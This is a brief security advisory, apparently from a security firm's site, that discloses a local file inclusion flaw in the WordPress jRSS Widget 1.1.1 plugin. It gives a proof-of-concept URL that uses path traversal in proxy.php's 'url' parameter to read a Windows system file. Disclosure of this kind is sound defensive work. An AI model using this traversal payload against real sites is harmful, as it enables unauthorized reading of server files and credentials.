Home
Consulting
Advisories
Software
Articles
Contact

WordPress jRSS Widget 1.1.1 Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in WordPress jRSS Widget 1.1.1 can be exploited to include arbitrary files.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini


Copyright © 2018 AutoSec Tools LLC